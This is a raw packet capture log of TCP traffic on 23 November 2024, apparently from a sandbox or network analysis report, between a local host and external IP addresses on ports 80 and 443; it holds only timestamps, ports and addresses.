                                                                                                                                                                                          Nov 23, 2024 17:44:34.567049980 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567060947 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567073107 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567104101 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567136049 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567298889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567348957 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567899942 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567946911 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567959070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.567989111 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568099022 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568109989 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568120956 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568150997 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568207026 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568716049 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568789005 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568799973 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568840981 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568893909 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568942070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568953991 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.568989992 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569567919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569633007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569645882 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569703102 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569762945 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569776058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569787025 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.569832087 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570460081 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570513010 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570525885 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570561886 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570656061 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570667982 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570678949 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570743084 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.570787907 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571450949 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571496964 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571507931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571535110 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571594954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571607113 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571619987 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571646929 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.571674109 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572374105 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572386026 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572397947 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572429895 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572504044 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572516918 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572530985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572552919 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.572577953 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573364973 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573379040 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573385954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573455095 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573591948 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573605061 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573616982 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573645115 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.573657990 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574160099 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574234962 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574246883 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574281931 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574300051 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574312925 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574325085 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574389935 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574851036 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574889898 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574902058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.574938059 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.575083971 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.575094938 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.575100899 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.575130939 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.575143099 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.692787886 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.693382978 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.693403006 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.693902969 CET49742443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.693908930 CET4434974213.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.707189083 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.707494020 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.707503080 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.707840919 CET49741443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.707844019 CET4434974113.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.758110046 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.761836052 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.761852980 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.762322903 CET49740443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.762329102 CET4434974013.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769402981 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769431114 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769447088 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769521952 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769567966 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769581079 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769587040 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769660950 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.769757032 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772177935 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772226095 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772238016 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772250891 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772294044 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772294998 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772309065 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772319078 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772358894 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772525072 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772600889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772617102 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772651911 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.772660971 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773282051 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773293018 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773308039 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773318052 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773339987 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773355007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773365974 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773586988 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773637056 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773647070 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773679972 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773706913 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773760080 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773780107 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773792028 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.773823023 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774481058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774498940 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774513960 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774549007 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774580002 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774586916 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774599075 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774610996 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.774635077 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775410891 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775423050 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775464058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775475979 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775517941 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775544882 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775557041 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.775590897 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776236057 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776320934 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776334047 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776369095 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776376009 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776391983 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776395082 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776407957 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.776448011 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777744055 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777761936 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777774096 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777784109 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777796984 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777806997 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777821064 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777837038 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.777981997 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778031111 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778043032 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778043985 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778080940 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778187037 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778229952 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778242111 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.778271914 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779050112 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779112101 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779123068 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779198885 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779211998 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779247999 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779261112 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779272079 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779299974 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779789925 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779856920 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779869080 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779879093 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779886007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779911995 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.779989004 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780002117 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780042887 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780594110 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780637980 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780651093 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780684948 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780698061 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780849934 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780869007 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780880928 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.780900002 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781529903 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781575918 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781589031 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781624079 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781651020 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781682014 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781694889 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781706095 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.781742096 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782330990 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782381058 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782414913 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782428980 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782459021 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782594919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782608032 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782618999 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.782654047 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783191919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783238888 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783252954 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783286095 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783297062 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783303976 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783323050 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783410072 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.783428907 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784214020 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784226894 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784239054 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784266949 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784307003 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784436941 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784449100 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784460068 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.784498930 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785003901 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785038948 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785047054 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785052061 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785108089 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785140038 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785151005 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785162926 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785186052 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785828114 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785845041 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785854101 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785886049 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.785914898 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.812762022 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.813349009 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.813381910 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.813867092 CET49744443192.168.2.513.107.246.63
                                                                                                                                                                                          Nov 23, 2024 17:44:34.813880920 CET4434974413.107.246.63192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980797052 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980843067 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980855942 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980873108 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980884075 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980923891 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980981112 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.980990887 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.981029034 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.981172085 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983253002 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983331919 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983344078 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983406067 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983468056 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983488083 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983499050 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983530045 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983691931 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983738899 CET4973280192.168.2.5185.215.113.16
                                                                                                                                                                                          Nov 23, 2024 17:44:34.983778000 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.984057903 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.984102011 CET8049732185.215.113.16192.168.2.5
                                                                                                                                                                                          Nov 23, 2024 17:44:34.984113932 CET8049732185.215.113.16192.168.2.5
